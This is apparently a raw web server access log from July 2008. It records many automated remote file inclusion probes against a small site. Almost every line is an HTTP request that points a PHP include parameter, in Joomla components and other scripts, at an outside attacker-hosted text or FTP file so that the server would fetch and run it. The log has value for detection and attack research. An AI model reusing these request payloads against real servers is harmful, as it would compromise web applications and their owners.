77.221.130.15 - - [14/Jul/2008:09:28:13 -0700] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:28:13 -0700] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:28:15 -0700] "GET /logs/access_080423.log/include/Classes.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:28:16 -0700] "GET /include/Classes.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:28:16 -0700] "GET /logs/access_080423.log/include/statistic.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:28:16 -0700] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:28:16 -0700] "GET /include/statistic.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:28:16 -0700] "GET /logs/include/statistic.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:28:53 -0700] "GET /logs/access_080315.log/index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:28:54 -0700] "GET /logs/access_080315.log/index.php5?lang=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:29:02 -0700] "GET /logs/access_080423.log/include/status_top_x.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:29:02 -0700] "GET /include/status_top_x.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:29:03 -0700] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:29:04 -0700] "GET /logs/access_080316.log/include/Classes.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.27.1.194 - - [14/Jul/2008:09:29:05 -0700] "GET /logs/allinurl:index.php?root_PATH=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
218.27.1.194 - - [14/Jul/2008:09:29:05 -0700] "GET /allinurl:index.php?root_PATH=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:29:09 -0700] "GET /logs/access_080316.log/include/statistic.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:29:14 -0700] "GET /logs/access_080316.log/include/libchart-1.1/libchart.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.7.34.177 - - [14/Jul/2008:09:29:36 -0700] "GET /logs/access.log//BaseAdmin.class.php?_CONF[path]=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.7.34.177 - - [14/Jul/2008:09:29:36 -0700] "GET /logs/access.log//BaseAdmin.class.php?_CONF[path]=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.7.34.177 - - [14/Jul/2008:09:29:55 -0700] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:29:58 -0700] "GET /logs/access_080316.log/include/status_top_x.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:09:30:12 -0700] "GET //poll/booth.php?include_path=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:09:30:12 -0700] "GET /logs//poll/booth.php?include_path=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:09:30:23 -0700] "GET /page.php?doc=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:30:39 -0700] "GET /logs/access_080423.log/include/status.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:30:39 -0700] "GET /include/status.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:30:40 -0700] "GET /logs/include/status.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:09:31:01 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.242.135 - - [14/Jul/2008:09:31:01 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.7.34.177 - - [14/Jul/2008:09:31:13 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.7.34.177 - - [14/Jul/2008:09:31:13 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.7.34.177 - - [14/Jul/2008:09:31:22 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.7.34.177 - - [14/Jul/2008:09:31:22 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:31:26 -0700] "GET /logs/access_080316.log/include/status.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:31:55 -0700] "GET /logs/access_071230.log/index.php?lang=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:31:59 -0700] "GET /index.php?lang=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 200 18431 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:31:59 -0700] "GET /logs/index.php?lang=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.180.39.222 - - [14/Jul/2008:09:32:17 -0700] "GET /logs/access_080423.log/include/statistic.inc.php?tm_includepath=http://e-arhontariki.gr/images/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.180.39.222 - - [14/Jul/2008:09:32:17 -0700] "GET /include/statistic.inc.php?tm_includepath=http://e-arhontariki.gr/images/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.180.39.222 - - [14/Jul/2008:09:32:17 -0700] "GET /logs/include/statistic.inc.php?tm_includepath=http://e-arhontariki.gr/images/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.40 - - [14/Jul/2008:09:32:44 -0700] "GET /logs/access_080618.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:32:45 -0700] "GET /logs/access_080315.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.180.39.222 - - [14/Jul/2008:09:33:09 -0700] "GET /logs/access_080316.log/include/statistic.inc.php?tm_includepath=http://e-arhontariki.gr/images/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.218.118 - - [14/Jul/2008:09:33:28 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.227.218.118 - - [14/Jul/2008:09:33:28 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:33:58 -0700] "GET /logs/access_080423.log/include/libchart-1.1/libchart.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:33:59 -0700] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:34:25 -0700] "GET /logs/access_080423.log/include/status_top_x.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:34:26 -0700] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:34:26 -0700] "GET /logs/access_080423.log/include/Classes.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.82.154.121 - - [14/Jul/2008:09:34:27 -0700] "GET /logs/access_080315.log/~scanxhttp://ilim.mine.nu/stats/images/macx.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:34:27 -0700] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.82.154.121 - - [14/Jul/2008:09:34:29 -0700] "GET /~scanxhttp://ilim.mine.nu/stats/images/macx.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:34:29 -0700] "GET /logs/access_080423.log/include/statistic.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:34:30 -0700] "GET /logs/include/statistic.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.82.154.121 - - [14/Jul/2008:09:34:30 -0700] "GET /logs/~scanxhttp://ilim.mine.nu/stats/images/macx.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.109.30.182 - - [14/Jul/2008:09:34:32 -0700] "GET http://www.dmulk.com/logs/access_080507.log HTTP/1.0" 200 327680 "-" "hjvcq11pry wabgkapdmvbhwjnHpoxqdddH" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:34:41 -0700] "GET /logs/access_080316.log/include/libchart-1.1/libchart.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:35:03 -0700] "GET /logs/access_080316.log/include/status_top_x.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:35:08 -0700] "GET /logs/access_080316.log/include/Classes.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:09:35:17 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:09:35:17 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:09:35:17 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:35:18 -0700] "GET /logs/access_080316.log/include/statistic.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:09:35:29 -0700] "GET /logs/access_080207.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET //modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET //modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:35:58 -0700] "GET /logs/access_080423.log/include/status.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET /logs//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET /logs//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET /logs//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET /logs//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:35:58 -0700] "GET /logs//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:35:59 -0700] "GET /logs/include/status.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:36:14 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:36:14 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:36:14 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:36:21 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:36:22 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:36:22 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:36:22 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:36:22 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.109.76.232 - - [14/Jul/2008:09:36:32 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://hscu.de/page/bilder/schult_a102.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:36:41 -0700] "GET /logs/access_080316.log/include/status.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:37:42 -0700] "GET /logs/access_080423.log/index.php?trans=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [14/Jul/2008:09:38:51 -0700] "GET /logs/access.log/index.php?content=http://www.abacuss.com/cat-city/phorum/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [14/Jul/2008:09:38:56 -0700] "GET /index.php?content=http://www.abacuss.com/cat-city/phorum/.debug/id1.txt?? HTTP/1.1" 200 18447 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [14/Jul/2008:09:38:56 -0700] "GET /logs/index.php?content=http://www.abacuss.com/cat-city/phorum/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:09:39:40 -0700] "GET /logs//calendar.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:09:39:40 -0700] "GET //calendar.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:09:39:47 -0700] "GET /index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:09:39:47 -0700] "GET /index.php5?lang=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:09:39:56 -0700] "GET /logs/main.php?pagina=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:09:39:56 -0700] "GET /main.php?pagina=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:09:40:14 -0700] "GET /logs/access.log/download.php?sub=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:09:40:16 -0700] "GET /?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 200 18401 "-" "libwww-perl/5.805" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:09:40:23 -0700] "GET /logs/access_080331.log/page.php?doc=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:09:40:24 -0700] "GET /logs/page.php?doc=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:09:40:30 -0700] "GET /logs/download.php?sub=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.74.1 - - [14/Jul/2008:09:40:30 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:09:41:40 -0700] "GET /logs/access_080117.log//login.php?dir=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:09:41:45 -0700] "GET //login.php?dir=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:09:41:45 -0700] "GET /logs//login.php?dir=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:09:41:45 -0700] "GET /logs/access_080128.log//login.php?dir=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:41:54 -0700] "GET /logs//calendar.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:41:54 -0700] "GET //calendar.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:42:30 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:42:30 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
